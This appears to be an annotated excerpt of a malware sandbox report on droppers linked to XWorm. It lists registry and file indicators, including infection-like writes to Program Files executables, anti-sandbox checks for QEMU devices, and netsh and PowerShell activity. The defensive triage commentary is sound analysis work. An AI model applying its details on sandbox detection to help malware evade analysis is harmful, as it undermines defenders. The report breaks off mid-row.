C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE | iyMbXS.exe
C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe | izTLZKj.exe
C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | izTLZKj.exe
C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe | izTLZKj.exe
Every row is one of the two Bdaejec-tagged droppers, izTLZKj.exe or iyMbXS.exe, opening a third-party executable under Program Files for write access (7-Zip, Java, Office, Firefox, Chrome, Acrobat Reader, Store apps, .NET). This footprint belongs to those two binaries rather than to XWorm and is consistent with file infection; on a host where they ran, hash every listed executable against a known-good copy before trusting it, and assume the list here is capped at 64 by the report rather than complete.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
These rows show netsh.exe reading its own helper-DLL registration key, which it does on every start; there is no Set value on the NetSh key here, so no helper DLL was registered. The real action is the two netsh.exe invocations (PIDs 3708 and 2120) recorded under "Modifies Windows Firewall".
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69Disable-winDefender.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69Disable-winDefender.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | izTLZKj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | izTLZKj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | iyMbXS.exe
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | wmiprvse.exe
Every row is wmiprvse.exe servicing a WMI query; the report does not identify the WMI client, so this may be the sample's evasion check or background WMI activity. The device strings themselves (Ven_QEMU, Prod_QEMU_DVD-ROM) are exactly the kind of virtualisation tell such checks look for, which is why the sandbox pairs the QEMU optical drive with a real-looking WDC disk model.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
mousocoreworker.exe is the Windows Update Session Orchestrator worker, so these two signatures are OS background activity rather than the sample's own anti-sandbox checks; they carry no attribution weight on their own.
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={56F93C62-742F-41DC-B6BD-FDD623ECFEA1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionReason = "1" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecision = "0" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionTime = 38c7fe8f3dc9db01 | svchost.exe
The powershell.EXE rows are the per-user certificate store and WinTrust keys that .NET creates under HKU\.DEFAULT the first time crypto is used in the SYSTEM profile; the OfficeClickToRun.exe telemetry keys and the svchost.exe WPAD entries under S-1-5-19 are background noise. The signal in this table is not any single key but that PowerShell ran as SYSTEM at all, which ties back to the two powershell.EXE instances flagged for parent spoofing and SetThreadContext.
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = 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 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = d216597c3dc9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = 947fe37b3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = 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 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- = f541f07a3dc9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 97c2fa7a3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2dcfc67fe523e1f6f503602bbb5f955d40b381101dbfc4fdf0b856311a7e53a2" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 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 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" 
RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created 
\REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
